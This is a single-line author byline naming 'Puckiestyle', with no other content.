Author – Puckiestyle